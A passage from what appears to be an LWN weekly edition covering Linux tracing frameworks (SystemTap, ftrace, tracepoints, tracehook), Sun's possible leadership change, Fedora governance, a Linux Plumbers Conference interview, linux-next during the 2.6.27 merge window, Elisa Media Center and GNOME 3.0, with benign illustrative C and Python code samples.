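/* Hypothetical stand-in for a debugfs dentry: a name plus child links. */
struct node {
    char name[32];
    struct node *first_child;
    struct node *next_sibling;
};

/* Create a node under parent (or a new root when parent is NULL). */
struct node *node_create(const char *name, struct node *parent)
{
    struct node *n = calloc(1, sizeof(*n));

    assert(n != NULL);
    /* calloc() zeroed the buffer, so the copy stays NUL-terminated */
    strncpy(n->name, name, sizeof(n->name) - 1);
    if (parent) {
        n->next_sibling = parent->first_child;
        parent->first_child = n;
    }
    return n;
}

/*
 * Remove a whole tree, children first, and return the number of nodes
 * freed.  For brevity the node is not unlinked from its parent, so this
 * should be called on a root created with a NULL parent.
 */
int node_remove_recursive(struct node *n)
{
    int freed = 0;
    struct node *child, *next;

    if (!n)
        return 0;
    for (child = n->first_child; child; child = next) {
        next = child->next_sibling;     /* save before the child is freed */
        freed += node_remove_recursive(child);
    }
    free(n);
    return freed + 1;
}
```

A driver-like caller would hold on to the root returned by the first
node_create() call, ignore the return values of the rest, and pass that
root to node_remove_recursive() at cleanup time.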


The tail end of the 2.6.27 merge window will be covered in next week's LWN
Kernel Page.

		Tracing: no shortage of options


Three weeks ago, LWN looked at
the renewed interest in dynamic tracing, with an emphasis on
SystemTap.  Tracing is a perennial presence on end-user wishlists; it
remains a handy tool for companies like Sun Microsystems, which wish to
show that their offerings (Solaris, for example) are superior to Linux.  It
is not surprising that there is a lot of interest in tracing
implementations for Linux; the main surprise is that, after all this time,
Linux still does not have a top-quality answer to DTrace - though, arguably,
Linux had a working tracing mechanism long before DTrace made its appearance.

Even a casual reader of the kernel mailing list will have noticed that
there are a lot of tracing-related patches in circulation at the moment.
There are so many, in fact, that it is hard to keep track of them all.  So
this article will take a quick look at the code which has been posted in an
attempt to make the various options a bit clearer.

SystemTap

SystemTap remains the presumptive Linux tracing solution of choice.
It is hampered by a few problems, though, including usability issues, a
complete lack of static trace points in the mainline kernel, and no
user-space tracing capability.  On the
usability side, we are seeing a few more kernel developers trying to put
SystemTap to work and posting about the problems they are having.  If one
takes as a working hypothesis the notion that, if kernel hackers cannot
make SystemTap work, many other users are likely to encounter difficulties
as well, then one might conclude that addressing the reported problems
would be a priority for the SystemTap developers.

The SystemTap developers do seem to be interested in these reports, which
is a good sign.  There are other things happening in the SystemTap arena,
including the release of
version 0.7 on July 15.  This release adds a number of new
features and tapsets, and a substantial set of examples as well.
Meanwhile, Anup Shan has posted an interesting
integration of SystemTap and the fault injection framework, allowing
tapsets to control fault injection and trace the results.

James Bottomley has been playing some with the SystemTap code; one result
of that work is changes to
SystemTap's internal relocation code in an attempt to make it more
acceptable for mainline kernel inclusion.  There can be no doubt that the
out-of-tree nature of much of the SystemTap support code has made it harder
for that code to progress, so any improvement which makes it more likely
that some of this code will be merged is welcome.

Also by James is this patch
implementing a new way to put markers into the kernel.  The addition of
markers (or static tracepoints) has always been problematic in that many of
these markers, by their nature, need to go into some of the hottest code
paths in the kernel.  To support dynamic tracing, these markers need to be
available on production systems, so they must work without creating any
significant performance regressions.  Quite a bit of work has gone into the
static marker code which is in the kernel (but mostly unused) now, but some
developers are still uncomfortable with putting them into
performance-critical paths.

James's patch addresses these concerns by putting the tracepoints entirely
outside of the code paths.  Rather than add some sort of marker to the
code, these markers simply make a note of where in the code the marker
is supposed to be; this note is stored in a separate part of the kernel
binary.  That information is enough for a run-time tool to patch in an
actual jump to a tracing function should somebody want to see the
information from that tracepoint.  An additional benefit is that these
markers do not interfere with any optimizations done by the compiler.  Other
solutions can insert optimization barriers which, while they do make life
easier for the tracing subsystem, also affect the speed of the code even
when the trace points are not active.

Ftrace

The text above said that the kernel's static tracepoint
code is "mostly unused."  That would have been better expressed as
"completely," except that the 2.6.27 kernel will include a user in the form
of the ftrace framework.  One of the things which makes ftrace truly unique
is that its documentation was not only merged before the code itself, but
well before: the 2.6.26 kernel includes the excellent Documentation/ftrace.txt file.

The ftrace (which stands for "function tracer") framework is one of the
many improvements to come out of the realtime effort.  Unlike SystemTap, it
does not attempt to be a comprehensive, scriptable facility; ftrace is much
more oriented toward simplicity.  There is a set of virtual files in a
debugfs directory which can be used to enable specific tracers and see the
results.  The function tracer after which ftrace is named simply outputs
each function called in the kernel as it happens.  Other tracers look at
wakeup latency, events enabling and disabling interrupts and preemption,
task switches, etc.  As one might expect, the available information is
best suited for developers working on improving realtime response in
Linux.  The ftrace framework makes it easy to add new tracers, though, so
chances are good that other types of events will be added as developers
think of things they would like to look at.

Tracepoints

The kernel
markers mechanism is meant to be the way that static tracepoints are
inserted into the kernel.  To that end, a great deal of effort went into
making these markers fast; they are, for all practical purposes, a set of
no-op instructions until somebody wants to turn one on, at which point the
real tracing code is patched into the running kernel.  Since they were
merged, however, kernel markers have been the subject of a few grumbles.

In particular, kernel markers use a somewhat awkward mechanism to ensure
that any arguments passed to the tracing function are interpreted correctly
there.  Each marker has a printk()-style format string associated
with it; that string describes the type of each "argument" (a variable
or expression within the code being traced).  When tracing code activates a
marker, it will supply a function to be called when the marker is hit and a
format string describing the arguments that the function expects.  The
marker code will ensure that both format strings match; otherwise the
marker will not be enabled.  The problem is that the format string requires
extra work to write and is only approximate in its specification of the
types involved.  These strings can make it clear that a given argument is a
pointer, for example, but they say nothing about what type is pointed to.
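
The format-string check described above can be sketched in user space.
This is a simplified mock, not the kernel's marker code: struct mock_marker
and the mock_marker_connect() and mock_marker_hit() functions are
hypothetical names, each marker carries a single argument, and the
comparison is assumed to be a plain string match.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Signature shared by every probe in this mock: format plus one argument. */
typedef void (*mock_probe_fn)(const char *format, void *arg);

/* Hypothetical stand-in for a kernel marker; not the kernel's structure. */
struct mock_marker {
    const char *name;
    const char *format;     /* describes the argument at the marker site */
    mock_probe_fn probe;    /* NULL until a probe is connected */
};

/* Number of times count_probe() has run. */
int mock_hits;

/* A trivial probe which only counts how often the marker was hit. */
void count_probe(const char *format, void *arg)
{
    (void)format;
    (void)arg;
    mock_hits++;
}

/*
 * Connect a probe.  The probe supplies the format it expects; the
 * marker is enabled only if that string matches the marker's own.
 */
int mock_marker_connect(struct mock_marker *m, const char *probe_format,
                        mock_probe_fn probe)
{
    assert(m != NULL && probe_format != NULL);
    if (strcmp(m->format, probe_format) != 0)
        return -1;          /* mismatch: the marker stays disabled */
    m->probe = probe;
    return 0;
}

/* Called at the marker site; does nothing until a probe is connected. */
void mock_marker_hit(struct mock_marker *m, void *arg)
{
    if (m->probe)
        m->probe(m->format, arg);
}
```

A marker declared with the format "task %p" will reject a probe expecting
"task %d", but it will accept any probe which also says "task %p", whatever
that probe believes the pointer to be.  That gap is the weakness noted
above.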


In response to various efforts to get around this issue, Mathieu Desnoyers
(the original author of the kernel marker work) has proposed a new
mechanism called tracepoints.  They are another
way of putting static trace points into the kernel, but with a simpler and
more type-safe way of putting the pieces together.


With tracepoints, every tracepoint must be declared in a header file with
a mildly ugly set of macros:


This definition will create a new tracepoint called
tracepoint_name.  Any function attached to that tracepoint must
have a function prototype as provided in the TPPROTO() macro; the
names of the associated arguments are provided with TPARGS().

Perhaps this is better understood with an example.  The tracepoints patch
set includes quite a few static points for use with the LTTng tracing
toolkit.  There is one called sched_wakeup which fires whenever
the scheduler wakes up a process.  It is defined with:


The actual insertion of the tracepoint is a line like this:


Note the trace_ prefix added to the supplied name.  At this point
in the code, a tracing function can be called with rq (the run
queue of interest) and p (the process which is waking up) as parameters.
Until an actual function is connected to the tracepoint, though, this
declaration is essentially a no-op.  Connection of a trace function is done
through a call to:


The register_trace_sched_wakeup() function (created as part of the
DEFINE_TRACE() definition) will connect the supplied trace
function to the tracepoint.  The fact that the function prototype for the
trace function is supplied as part of the tracepoint definition means that
the compiler can perform thorough type checking; if the prototypes do not
match up, compilation will fail.  And that, in turn, should put an end to
those embarrassing situations where turning on tracing causes the system to
go down in flames.
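
The pieces described above fit together roughly as in the following
user-space sketch.  It is not the kernel's implementation: the
DEFINE_TRACE() macro here supports only one probe per tracepoint and does
no locking, struct rq and struct task_struct are one-field stand-ins, and
record_wakeup() and demo_wakeup() are names invented for the example.  What
it does show is how DEFINE_TRACE(), TPPROTO(), and TPARGS() can generate a
trace_sched_wakeup() call and a register_trace_sched_wakeup() function
whose argument types are checked by the compiler.

```c
#include <assert.h>
#include <stddef.h>

/* Both helpers simply pass their arguments through, commas included. */
#define TPPROTO(...) __VA_ARGS__
#define TPARGS(...)  __VA_ARGS__

/*
 * Simplified mock of the macro: one probe pointer per tracepoint, a
 * registration function, and the trace_<name>() function that is
 * placed at the point of interest.  This sketch allows one probe only.
 */
#define DEFINE_TRACE(name, proto, args)                                 \
    static void (*tp_probe_##name)(proto);                              \
    static inline int register_trace_##name(void (*probe)(proto))       \
    {                                                                   \
        assert(probe != NULL);                                          \
        if (tp_probe_##name)                                            \
            return -1;                                                  \
        tp_probe_##name = probe;                                        \
        return 0;                                                       \
    }                                                                   \
    static inline void unregister_trace_##name(void)                    \
    {                                                                   \
        tp_probe_##name = NULL;                                         \
    }                                                                   \
    static inline void trace_##name(proto)                              \
    {                                                                   \
        if (tp_probe_##name)                                            \
            tp_probe_##name(args);                                      \
    }

/* One-field stand-ins for the kernel structures of the same names. */
struct rq { int cpu; };
struct task_struct { int pid; };

DEFINE_TRACE(sched_wakeup,
             TPPROTO(struct rq *rq, struct task_struct *p),
             TPARGS(rq, p))

/* The pid most recently seen by record_wakeup(), or -1 if none. */
int last_woken_pid = -1;

/* A probe; its prototype must match the TPPROTO() list above. */
void record_wakeup(struct rq *rq, struct task_struct *p)
{
    (void)rq;
    last_woken_pid = p->pid;
}

/* Pretend to wake a task, then report what (if anything) was traced. */
int demo_wakeup(int pid)
{
    struct rq rq = { 0 };
    struct task_struct task = { pid };

    trace_sched_wakeup(&rq, &task);     /* no-op until a probe is attached */
    return last_woken_pid;
}
```

Before register_trace_sched_wakeup(record_wakeup) is called, demo_wakeup()
leaves last_woken_pid untouched; afterward, each call records the pid.
Handing register_trace_sched_wakeup() a function with some other prototype
draws a complaint from the compiler rather than a surprise at run time.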

Interestingly, tracepoints have dispensed with much of the mechanism
developed to minimize the runtime impact of kernel markers; in particular,
they do not use the "immediate values" code.  Profiling has shown that the
performance impact of tracepoints is so low that there is little value in
the added complexity of runtime patching of kernel code.  Still, there are
signs that some kernel developers will object to the addition of
tracepoints in their current form.  Developers want tracing support - but
not at the cost of slower performance, even if that cost is hard to
measure.

Tracehook

Finally, Roland McGrath recently surfaced with the tracehook patch set.  Tracehook
has a rather different focus; it is, essentially, a cleanup of the way the
kernel handles the ptrace() system call.  The tracehook patches
try to organize all of the process tracing code (much of which is
architecture-dependent) into one place where it can be dealt with as a
unit. 

Tracehook is meant to be a first step toward the merging of a new version
of the utrace code.  Utrace
has long been planned as the successor to the current ptrace()
implementation, which has few admirers.  But utrace has encountered a
number of difficulties, so its path into the kernel has been slow.  It
disappeared from the lists entirely for a while, but a new version of the
patches is said to be coming soon; Roland notes that he expects "some
vigorous feedback" when that happens.


The real importance of the ptrace() rework is that it is the path
toward integrated tracing of kernel- and user-space events.  And that, of
course, is one of the biggest features offered by DTrace which is not yet
available in SystemTap.  Getting user-space tracing into the kernel -
especially if it could work with the tracepoints already being inserted
into some applications for DTrace - would be a major step forward for
Linux.  A lot of people will be watching when this patch set comes around
again.

Meanwhile, Roland would like to see the tracehook code merged for 2.6.27.
He is late to the party, though, and this code has not done any time in
linux-next.  So it is not yet clear whether tracehook will go in before the
merge window closes, or whether, instead, it will have to wait for 2.6.28. 


In summary...

As can be seen, there is a lot happening in the area of tracing support for
Linux.  Tracing, it seems, is an idea whose time has come, at last.  If the
pieces described here can be merged and integrated into a unified
framework, and if it can all be made sufficiently easy to use, the time for
"DTrace envy" will come to an end.  Those "ifs" are not small ones,
though.  There is quite a bit of work to be done yet; hopefully the current
level of energy will remain until the job is done.

		Anticipating the sunset


In his two years at the top of Sun Microsystems, Jonathan Schwartz has
embraced a number of ambitious changes.  While one need not look too far to
find complaints about how Sun works with the free software community, there
can be no doubt that Mr. Schwartz has made the company far more open than
it was in the past.  Free software is an important part of Sun's overall
strategy; this can be seen in the company's claims to have contributed more
code to the community than any other source.

Unfortunately, Mr. Schwartz's time at Sun has been accompanied by a 50%
decline in Sun's stock price.  Whether he could possibly have done any
better given the state of the company when he took over and the state of
the economy now is something one could debate, but we'll not do that
here.  More interesting, from the community's point of view, are the rumors
that he could soon be looking for a new job.


It has often been said that if corporations were people, they would have
the personality of a sociopathic teenager.  Certainly companies can exhibit
no end of the sort of moody, capricious, and even self-destructive behavior
sometimes seen in adolescents - then they come back and ask for more money.
An abrupt change at Sun could well bring in 
a CEO determined to show that his predecessor's policies were fundamentally
wrong and were primarily responsible for Sun's problems.  And that could
bring some interesting changes.


Imagine a Sun which decided that it could no longer afford to share its
Valuable Intellectual Property with the world.  Perhaps Solaris,
OpenOffice, Java, etc. would be relicensed under the new, Sun Proprietary
Overtly Indecent License (SPOIL), with no more free releases.  Hungry
lawyers could start prowling for cases where Solaris code has been mixed
into projects with incompatible licenses.  StarOffice might go OOXML-only.
MySQL could shift to a new, undocumented on-disk format with users' data
subject to Sun-controlled DRM on every table.  The new Java license would
forbid the publication of not just benchmark results, but also of criticism
of features of the language.


Clearly, some of these scenarios are rather far afield - though they are
fun to make up.  But, if we have
learned anything from the SCO story, it must be that a company which
presents itself as a solid part of the community can, in short order, turn
around and go against us.  Even if Sun does not degenerate to the point of
starting legal attacks against free software, it could certainly put an end
to the many contributions that it is making now.


Whenever one deals in company-owned free software, one should consider what
happens if that company goes away.  Projects with distributed copyright
ownership are mostly immune to this kind of problem; there is no single
company which could create huge problems for the Linux kernel by
withdrawing its participation, for example.  (Along these lines, it's worth
noting that Evolution recently stopped requiring copyright assignments from
its developers.)  But, in
situations where a single company owns the copyrights and dominates
development, a change of heart could make a real difference to downstream
users.  It all depends on what sort of community has developed around the
code.


If future versions of Solaris were to be proprietary-only, the current
releases would still be out there.  But the Solaris development community
outside of Sun is tiny, so chances are good that such a move would kill
OpenSolaris as a free software project - to the extent that it is one now.
Anybody wishing to continue to use Solaris would probably have to move to
the proprietary version.  OpenOffice.org would likely survive, though the
external development community - never encouraged that much by Sun - would
have to organize itself and, perhaps, choose a new name.  Java is entirely
subject to Sun's policies regarding conformance tests and such; it could
easily revert to its status from a few years ago.  And so on.  The point is
that a change of heart at Sun could easily make us appreciate the company's
relatively friendly attitude now, and could create difficulties for
distributors and users of Sun-sponsored projects.


There are plenty of other single-owner projects out there, of course.  Many
of them are entirely dependent on the continued good will (and viability)
of their sponsoring companies.  Others are less so.  Copyrights on code
released by the GNU project are generally owned by the Free Software
Foundation.  But, if Richard Stallman were to hit his head in an
unfortunate contra dancing accident and decide that, henceforth, FSF-owned
code would only be released under the binary-only GPLv4, those projects
would not suffer much.  Instead, the development community behind that code
- strongly influenced but not controlled by the FSF - would quickly move to
a new home and continue its work.  For a practical example, see the
creation of X.org in the wake of the relicensing of XFree86.


With any luck at all, the silly scenarios outlined above will not come to
pass.  But there is value in pondering how things could go.  Such thought
quickly leads to the conclusion that a vibrant development community is not
just good because it leads to faster progress and more cool features.  That
community is the source for the long-term support for the code, support
which is not subject to one company's quarterly results.

		Notes from the Fedora project


The Fedora folks have a lot of important problems on their minds.  As part
of that, there is currently a tense
election underway - to choose the codename for the Fedora 10
release.  There's a list of nine suitably silly, Red-Hat-legal-approved
names to choose from.  Your editor, fresh from another failed Rawhide
update, suggests voting for "terror."  Even though Rawhide hasn't been
that terrible recently.


Another election - this one for the membership of the Fedora Engineering
Steering Committee (FESCO) - just finished.
FESCO members this time around will be Bill Nottingham, Kevin Fenzi, Dennis
Gilmore, Brian Pepple, David Woodhouse, Jarod Wilson, Josh Boyer, Jon
Stanley and Karsten Hopp.  For the curious, the FESCO
mission is:


	FESCo handles the process of accepting new features, the acceptance
	of new packaging sponsors, Special Interest Groups (SIGs) and SIG
	Oversight, the packaging process, handling and enforcement of
	maintainer issues and other technical matters related to the
	distribution and its construction.


The new feature aspect of the job could be interesting in the near future;
there has been some clear confusion on what constitutes a new feature, as
compared to a mere "enhancement" which does not involve FESCO.  The
surprising (to some) replacement of RPM in Rawhide was one of those
ambiguous issues which brought this question to the fore.  There is now an
enhanced draft
feature policy up for review which, it is hoped, will clarify the
situation. 


Back in June, the results from the Fedora board election raised some concerns about the
process.  One reaction to these concerns can now be seen in this
proposal for term limits for board members.  The reasoning behind this
proposal is explained thusly by project
leader Paul Frields:


	The problem at hand was the perceived dominance by full-time Fedora
	people on the Board.  People who spend their entire $DAYJOB as well
	as their spare time on Fedora are automatically very involved and
	visible.  That can translate directly to votes on the basis of name
	recognition, which really disadvantages people who are very
	involved, but in a somewhat more limited fashion because they don't
	have the luxury of doing Fedora all day every day.


So the full-time Fedora folks are simply too prominent, to the point that
they need to be eased off the stage after a couple of terms on the board to
make room for everybody else.  Of course, there are a couple of exceptions.
The Fedora project leader, not being an elected member of the board, has no
such limits.  More to the point, though: term limits would not apply to
those board members appointed by Red Hat.  The reasoning here is:


	Extending these term limits to Red Hat appointed seats is not
	sensible for a number of reasons -- institutional knowledge,
	flexibility, etc.


As of this writing, there has not been a whole lot of discussion of the
term limit proposal; opinions which have been posted are not entirely
positive.  Fedora project members will want to consider whether this
proposal can achieve its stated goal.  It would be unfortunate if an
up-and-coming outsider - with associated institutional memory - got
term-limited off the board just as they were really hitting their stride. 


Finally, OLPC enthusiasts may want to have a look at the newly-formed OLPC
special interest group.  This group is working to make the Fedora
distribution (already shipped by OLPC) as well suited to that platform as
possible.  One of the results should be a special Sugar "spin" of Fedora.
There is a mailing list available for interested people to join.

		Interview: Kristen Carlson Accardi


Kristen Carlson Accardi is a Linux kernel developer for Intel's Open
Source Technology Group.  She is the maintainer for the PCIE hot-plug
driver, the SHPC hot-plug driver, and the PCI hot-plug subsystem
in the Linux kernel.  She is currently working on SATA
drivers, including implementing power management features.

Kristen is the benevolent dictator for the upcoming Linux Plumbers
Conference.  We interviewed her about LPC, why so many Linux
developers live near Portland, Oregon, and life as a kernel developer.


What is Linux Plumbers Conf?
And why the "Plumbers" part? 


Linux Plumbers Conference is a conference for developers working on
the low level programming of Linux, including kernel, libraries, and
system applications such as udev, hal, and dbus.  We came up with the
name "Plumbers" because we wanted to represent these areas as basic
system infrastructure which has many connections.  Plus these programs
are sort of the nasty, grimy, unglamorous underbelly of the system -
not unlike the pipes in your house.  Essential - but nobody wants to
know they are there and everyone takes them for granted until they
don't work.


Running a conference is a lot of work in addition to your full time
job as a Linux kernel developer.  What made you decide to start Linux
Plumbers Conf?


Actually, it was the idea of a group of people.  The Portland Linux
kernel community gets together once a month or so to socialize and
drink beer.  At one of these gatherings we had a conversation about
how difficult it was to solve big picture problems that cross multiple
project boundaries.  We felt that there are some cases where you
really need to be able to just get everyone in a room and be able to hash
things out in person, but there wasn't really a forum for this.
Existing conferences were either too narrow (like Kernel Summit or the
X developers summit) or too broad for our purposes.  

Then someone said
something like "Hey, why don't we just make our own conference".
Because we are nothing more than a group of developers with a shared
love of beer, we went to the Linux Foundation and asked them to
collaborate with us, and it's been a wonderful partnership.  It's
definitely been a challenge for a bunch of software engineers to try
and organize a conference, but we've leaned heavily on LF for advice
and we've learned a lot in the past year.


Most conferences are centered around talks in which speakers present
their work, but open source developers often skip the talks so they
can discuss ongoing projects face-to-face.  How is LPC balancing these
needs?


Our format for the conference is based on the idea that we would have
a bunch of "microconferences".  Each microconf is meant to represent
a topic that should be small enough to be able to adequately discuss
in a few hours, and should preferably span multiple project areas.
Each microconf is being organized by a single expert in the area who
dictates the content of the microconf.  The microconf runner may
decide to have a couple talks and an hour or so for discussion, or
they may decide to split the group into teams and solve some specific
problems.  We are leaving this up to the microconf runner to decide,
although we are recommending that talks be not more than 25 minutes in
length so that there is ample time for discussion and questions.


We also have a general track for presentations that do not fall under
our predefined MC topics.  In addition to the rooms for the
microconfs, we have several rooms that are going to be available for
"unconference" style talks.  People wishing to get together in smaller
groups will be able to reserve a room at the beginning of the
conference.  Our larger rooms will also be available in the afternoon
for working sessions.


For several years, developers have been organizing individual
summits and workshops for particular projects, like networking and
file systems.  LPC microconfs are similar, but they're held all in the
same location and time.  Why did you want to put the microconfs
together into one conference?


We did this to encourage cross project communication.  Individual
summits are great for solving narrow problems, but they tend to
compartmentalize developers from each other.


Who is organizing and sponsoring LPC?


LPC is organized by a group of volunteers from the Portland Linux
development community and is underwritten by the Linux Foundation.  We
are a group of developers who just wanted to attend a conference which
didn't happen to exist yet, so we made our own.  Because we are all
volunteers, we have very little overhead for this conference, and the
money our sponsors have given us is being used directly on making the
conference as productive and memorable as we can make it, with
hopefully a little left over to start over again next year.  Our
Platinum level sponsors are Intel and IBM, with NetApp sponsoring at
the Gold level, and HP, MontaVista, and Google at the Silver.  In addition, the
Linux Foundation and Portland State University have given us so
much more than money - they have been true collaborators and we are so
grateful for all their time and effort.


Were there any sponsorships you didn't accept?


Not that I can recall - we actually started fund raising a little late
and missed a lot of people's planning cycles.  We were extremely lucky
that there were so many great sponsors like Intel, IBM, NetApp, HP and
Google that believed our conference was valuable enough to find the
money in their budget despite the short notice.


How did you decide on the location of LPC?


Portland State University was always our first choice for LPC.  We
wanted a non-corporate, friendly environment that was downtown.  It
was very important to us as well to have a "green" conference - hey,
we are Oregonians!  We wanted a place where there were
plenty of hotels and restaurants within walking distance so that
people would not have to rent a car.  In addition, we didn't want the
more traditional convention center or hotel atmosphere, nor could we
afford it.


Tell us more about LPC as a green conference.


As frequent conference-goers, we are all a little dismayed by the
waste generated from conferences.  Disposable drinking cups and
bottled water, flyers and schwag that immediately hit the garbage bin
when you get back to your hotel, and driving around from event to
hotel and back again are just some of the things that we decided we'd
like to not have at our conference.  As such, we are not distributing
printed material at the conference.  We're also limiting our schwag to
only things we've deemed useful, and we are working with our caterers
to reduce paper waste and provide foods from local, sustainable
sources where possible.


How did you get started in Linux kernel development?


I started using Linux in college back in 1994 or 1995 - I wanted to be
able to work on my homework at home rather than in the lab, and all we
had in those days was a horrendously slow modem connection to the
school.  For years afterward, all I wanted to do for a living was to
work on Linux, but it wasn't until around 1999 that I got my first
chance to write some drivers for Linux while working in Intel's
networking division.  I had previously written device drivers for
Netware - a job I'd gotten right out of college.  After working on
out-of-tree drivers for embedded systems and research projects for
many years, I finally joined Intel's Open Source Technology Center in
2005 and was able to start contributing upstream in a meaningful way.


Portland is home to many top Linux developers, including Linus
Torvalds.  Why do you think Portland is so attractive to open source
developers?


Honestly - I have no idea.  People ask this question all the time, and
all we can do is speculate.  I know why a lot of us live here - it's a
great city to live in.  At some point you get enough critical mass of
developers that you start attracting others.  It could be any number
of things.  Maybe because it's easier to thumb our noses at Redmond
from here?


In your opinion, what are some of the most important technical
trends in Linux kernel development today?


Low power features in hardware are driving a lot of kernel development
these days.


Tell us about some of the places you've traveled for your job.


When you work in open source, you have to travel to meet your
"co-workers".  I've had a chance to go to OLS a few times, Sydney for
LCA a couple years ago, and Cambridge last year for Kernel Summit and
LinuxConfEU.  Recently I traveled to FISL in Porto Alegre, Brazil.
I've also been to Ireland for Skycon - a fun and interesting
conference.  I'm actually looking forward to not having to travel to
attend LPC.


Thanks, Kristen, for taking the time to answer our questions.

		Linux-next meets the merge window


Recent LWN articles on the linux-next tree have noted that, while this tree
has been working well in its role of identifying merge conflicts between
subsystem trees, it has not yet been through a full kernel development
cycle.  2.6.27 will be the first kernel release where linux-next was in
existence for the entire preceding cycle; in theory, everything which goes
into 2.6.27 should have been aged in linux-next first.  As the end of the
2.6.27 merge window nears, a look at how linux-next has affected the
process seems warranted.


One might think that linux-next maintainer Stephen Rothwell would be able
to take a break during the merge window; it should mostly be a matter of
watching the linux-next tree drain into the mainline.  As it happens, the
daily linux-next postings (example) suggest
a fair amount of scrambling to deal with merge conflicts, build failures,
and more.  There are a number of reasons for this, one of which is that
subsystem trees are merged into the mainline in an order which is
completely unrelated to their order in linux-next.  Patches which remain in
linux-next are being applied to a highly unstable base.


Another interesting phenomenon has been a fair number of patches appearing
in linux-next during the merge window.  Some of these are actually patches
intended for 2.6.28; once maintainers have dumped their 2.6.27 patches into
the mainline, they are starting to acquire stuff for the next time around.
Stephen has asked them not to do that,
requesting that 2.6.28 material not be directed toward linux-next until
after the 2.6.27-rc1 release.  The goal is that linux-next should be nearly
empty when 2.6.27-rc1 comes out.


Other patches, though, are intended for 2.6.27 but simply have not done
their time in the linux-next tree.  That has led to a certain amount of
developer grumpiness at times.  It is interesting to note, though, that one
of the biggest examples of linux-next avoidance - David Miller's merging of
the multiqueue networking code which he had finished writing hours before -
has generated relatively few complaints.  But various other types of
conflicts have generated a steady stream of terse notes from Andrew Morton
(who is in the unfortunate position of basing his work on top of
linux-next) on how new stuff should have been in linux-next weeks ago.


Another area of, say, colorful conversation has been around the TTY
subsystem, currently being subjected to a much-needed thrashing by Alan Cox.
Some developers have been unhappy with Alan for merging code which failed
to compile, even though those problems had already been identified in
linux-next.  Alan, instead, has become irritated with other developers who
have surprised him with TTY-layer changes of their own, causing Alan's
patches not to apply.  Alan has some quaint notions about actually testing
his patches, so the resolution of this kind of conflict requires the
running of a new set of regression tests and such; after this had happened
a few times in a row, he started getting a little short-tempered.  These issues
would appear to have been worked out at this point, but the idea behind
linux-next was to keep them from happening in the first place.


Yet another source of occasional merge issues is the rebasing of trees.
Rebasing, in git-speak, is the process of modifying the commit history in a
repository to cause a series of patches to look like they were written
against a later version of the code than they really were.  Rebasing can be
a useful technique; it generates a series of patches which applies cleanly
to the current state of the tree without generating a bunch of unsightly
merge commits.


Rebasing can be especially useful in the context of linux-next.  If testing
turns up a patch which breaks the build, simply committing a fix will leave
a period in the history where the kernel cannot be built, and that is bad
for people running bisections.  With the use of git's history editing
features, the offending patch can be fixed in place and all evidence of the
mistake disappears.  In essence, that embarrassing commit mentioning the
Eurasian campaign can be fixed up to properly note that we've always been
at war with Eastasia.


But rebasing a repository changes the history (by design), creating, in the
process, an entirely new set of commits.  Those commits are new code, to
the point that any results from testing the older version may no longer
apply.  The commits also have new names, so any other developer who was
using a version of the repository will be shaken off and unable to merge.
Issues related to rebasing have come up a couple of times during the merge
window, leading Linus to post a series of lectures on
the problems that rebasing can cause.  It is clearly a tool which must be
used with restraint, but occasional use of rebasing can, in the linux-next
context, lead to a better final merge.  Finding the right balance is
something each developer will have to learn.
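
The reason rebased commits get new names can be seen in a small model.  The
sketch below is not git's actual object format; it assumes only that a
commit's name is a hash covering both the change and the name of the parent
commit, which is the property that matters here.  The helper names
(commit_id, build_history) and the patch strings are hypothetical.

```python
import hashlib


def commit_id(parent_id, patch):
    """Model a commit name as a hash of the parent's name plus the change."""
    data = (parent_id + "\n" + patch).encode("utf-8")
    return hashlib.sha1(data).hexdigest()


def build_history(base_id, patches):
    """Apply patches in order on top of base_id; return the commit names."""
    names = []
    parent = base_id
    for patch in patches:
        parent = commit_id(parent, patch)
        names.append(parent)
    return names


patches = ["tty: fix locking", "tty: remove dead code"]

old_base = commit_id("", "older mainline")
new_base = commit_id(old_base, "mainline moved on")

original = build_history(old_base, patches)
rebased = build_history(new_base, patches)

# Same patches on a different base: every commit in the series is renamed.
all_renamed = all(a != b for a, b in zip(original, rebased))
print(all_renamed)
```

Because each name depends on the parent's name, moving the base renames every
commit in the series, so anybody who based work on the old names no longer
shares history with the rebased tree.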


In the end, the merge window remains a bit of an unruly time.  The process
of channeling the work of several hundred developers into the mainline over
a two-week period is unlikely to ever be an entirely smooth experience.
But, for all its glitches, the 2.6.27 merge window has been (so far!)
easier than 2.6.26.  The presence of the linux-next tree almost certainly
has something to do with that.  This tree's role continues to evolve, but
its benefits are starting to be felt.

		The Elisa Media Center project


Elisa Media Center
is a cross-platform (Windows Vista, XP, and Linux, eventually Mac)
media management project that is sponsored by
Fluendo.
The company is also known for its sponsorship of the
GStreamer
multimedia framework. The Elisa project's
home page explains:


Elisa is an open source cross-platform Media Center featuring an intuitive interface with a professional look and feel which can be easily used with a standard TV remote control. Elisa is designed to be easily extensible through plugins. It relies on Python and
Twisted as core technologies.


Elisa can manage movies, photographs, and music. It can work with
media from locally connected peripherals, other machines on the LAN
and the Internet. The software includes support for IR remotes and
touchscreens.  Elisa uses a modular design with support for
plugins
which give the system access to various media sites and
other information.
A fairly out-of-date
feature list
explains the capabilities in more detail.
A good way to see the capabilities of the software is to take a look at
the flashy 
demo video and screenshots.


Following on the heels of the recently
announced
version 0.5.1 (the initial public 0.5 series release),
version 0.5.2, entitled "Good news everyone" was
announced
this week:


The main outlines of this release are:
- The integration of a media scanner that indexes one's music collection
and allows one to browse it by Artists/Albums, with automatic albums'
covers and artists' photos retrieval;
- The localization of the UI. Thanks to contributions from the community
Elisa is currently fully translated in Spanish, Catalan, French,
Italian, German, Dutch, Polish, Swedish and Brazilian Portuguese.


The Elisa source code is available for
download;
packaged versions for Ubuntu and Debian should appear soon.


		GNOME 3.0 worries


The mood on some GNOME mailing lists in the weeks prior to the
recently-concluded GUADEC conference was somewhat somber; some members of
the community were clearly feeling that GNOME development had slowed down,
that the project lacked vision, and that GNOME was threatening to lose its
relevance with users.  GNOME subsequently emerged from GUADEC with a new executive
director, plans for a 3.0 release, and a new burst of enthusiasm.  It's
amazing what a week in an exotic city with large amounts of beer can
achieve.  Since then, however, the enthusiasm has dropped a bit, and work
on a proposed 3.0 press release appears to
have stalled.  GNOME is now faced with some big decisions, and it's not
clear what the project will do.


The initial driving force behind this effort appears to be a plan by the
developers of the GTK+ toolkit to move to a new ABI without concerning
themselves with backward compatibility.  Years of enforced ABI stability
have left GTK+ with a large pile of compatibility cruft which the
developers would like to leave behind; in addition, there are major changes
planned which would be hard to do in a backward-compatible mode.  So the
GTK+ developers would like to start over with a 3.0 release.  Lots of
planning is being done to make the transition easy; among other things,
